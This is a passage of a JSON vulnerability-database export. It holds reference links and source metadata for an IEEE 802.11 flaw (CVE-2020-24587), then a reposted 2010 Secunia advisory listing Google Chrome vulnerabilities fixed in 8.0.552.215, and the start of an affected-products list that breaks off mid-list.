        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3200"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35448"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20284"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35522"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35524"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-27645"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33574"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3487"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-5827"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25012"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35521"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-35942"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36312"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3572"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36086"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3778"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22898"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-16135"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36084"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3800"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36087"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36331"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-31535"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3445"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22925"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-20673"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33033"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20232"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20266"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-22876"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20231"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-36332"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-10001"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-36085"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-33560"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-17595"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3481"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-42574"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25009"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2018-25010"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35523"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-28153"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-13750"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-20197"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3426"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2019-18218"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3580"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3796"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/327.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-102-04"
      },
      {
        "trust": 0.1,
        "url": "https://threatpost.com/wormable-windows-bug-dos-rce/166057/"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1033.34~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1036.38~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1029.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1035.37"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-59.66"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25671"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1038.40"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1036.38"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-59.66~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1030.32"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1035.37~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1038.40~20.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4999-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1046.49"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1048.52"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5000-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1051.53~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1051.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1018.19"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1038.41"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1046.48~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1018.19~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-77.86~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1038.41~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-77.86"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1051.53"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1046.49~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1051.53~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1048.52~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1046.48"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4997-2"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-151.157"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1097.99"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-26558"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1078.86"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1106.120"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5018-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1109.116"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1092.98"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1121.134"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1109.118"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4140"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/vulnerabilities/rhsb-2021-009"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-43527"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-44228"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3712"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:5137"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4356"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
      },
      {
        "trust": 0.1,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-33194"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:4627"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-11T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "date": "2022-01-24T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "date": "2021-06-23T15:35:21",
        "db": "PACKETSTORM",
        "id": "163251"
      },
      {
        "date": "2021-06-23T15:38:23",
        "db": "PACKETSTORM",
        "id": "163253"
      },
      {
        "date": "2021-06-28T16:22:26",
        "db": "PACKETSTORM",
        "id": "163301"
      },
      {
        "date": "2021-06-23T15:33:13",
        "db": "PACKETSTORM",
        "id": "163249"
      },
      {
        "date": "2021-07-21T16:04:42",
        "db": "PACKETSTORM",
        "id": "163599"
      },
      {
        "date": "2021-11-10T17:10:23",
        "db": "PACKETSTORM",
        "id": "164875"
      },
      {
        "date": "2021-12-15T15:27:05",
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "date": "2021-11-10T17:04:39",
        "db": "PACKETSTORM",
        "id": "164837"
      },
      {
        "date": "2021-11-15T17:25:56",
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "date": "2021-05-11T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      },
      {
        "date": "2021-05-11T20:15:08.580000",
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-24587"
      },
      {
        "date": "2024-03-22T07:13:00",
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      },
      {
        "date": "2023-04-03T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      },
      {
        "date": "2023-04-01T22:15:07.527000",
        "db": "NVD",
        "id": "CVE-2020-24587"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote or local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "IEEE\u00a0802.11\u00a0 Vulnerabilities related to cryptographic strength in standards",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-006876"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "encryption problem",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202105-632"
      }
    ],
    "trust": 0.6
  }
}

var-201012-0280
Vulnerability from variot

Incomplete blacklist vulnerability in Google Chrome before 8.0.552.215 on Linux and Mac OS X allows remote attackers to have an unspecified impact via a "dangerous file.". Google Chrome is prone to multiple vulnerabilities. Attackers can exploit these issues to execute arbitrary code in the context of the browser, cause denial-of-service conditions, gain access to sensitive information, and bypass intended security restrictions; other attacks are also possible. Versions prior to Chrome 8.0.552.215 are vulnerable. Google Chrome is a web browser developed by Google (Google). Remote attackers can use \"dangerous files\" to cause unknown effects. ----------------------------------------------------------------------

Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).

Request a free trial: http://secunia.com/products/corporate/vim/


TITLE: Google Chrome Multiple Vulnerabilities

SECUNIA ADVISORY ID: SA42472

VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/42472/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=42472

RELEASE DATE: 2010-12-04

DISCUSS ADVISORY: http://secunia.com/advisories/42472/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/42472/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=42472

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: Multiple vulnerabilities and weaknesses have been reported in Google Chrome, where some have an unknown impact and other can potentially be exploited by malicious people to compromise a vulnerable system.

1) An unspecified error exists, which can lead to cross-origin video theft with canvas.

2) An unspecified error can be exploited to cause a crash with HTML5 databases.

3) An unspecified error can be exploited to cause excessive file dialogs, potentially leading to a crash.

4) A use-after-free error in the history handling can be exploited to corrupt memory.

5) An unspecified error related to HTTP proxy authentication can be exploited to cause a crash.

6) An unspecified error in WebM video support can be exploited to trigger an out-of-bounds read.

7) An error related to incorrect indexing with malformed video data can be exploited to cause a crash.

8) An unspecified error in the handling of privileged extensions can be exploited to corrupt memory.

9) An use-after-free error in the handling of SVG animations can be exploited to corrupt memory.

10) A use-after-free error in the mouse dragging event handling can be exploited to corrupt memory.

11) A double-free error in the XPath handling can be exploited to corrupt memory.

SOLUTION: Fixed in version 8.0.552.215.

PROVIDED AND/OR DISCOVERED BY: The vendor credits: 1) Nirankush Panchbhai and Microsoft Vulnerability Research (MSVR) 2) Google Chrome Security Team (Inferno) 3) Cezary Tomczak (gosu.pl) 4) Stefan Troger 5) Mohammed Bouhlel 6) Google Chrome Security Team (Chris Evans) 7) miaubiz 8, 10) kuzzcc 9) Sławomir Błażek 11) Yang Dingning from NCNIPC, Graduate University of Chinese Academy of Sciences

ORIGINAL ADVISORY: http://googlechromereleases.blogspot.com/2010/12/stable-beta-channel-updates.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/

EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201012-0280",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "chrome",
        "scope": "lt",
        "trust": 1.8,
        "vendor": "google",
        "version": "8.0.552.215"
      },
      {
        "model": "kernel",
        "scope": null,
        "trust": 0.8,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "mac os x",
        "scope": null,
        "trust": 0.8,
        "vendor": "apple",
        "version": null
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.484.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.480.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.482.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.459.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.479.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.483.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.476.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.481.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.477.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "google",
        "version": "6.0.475.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
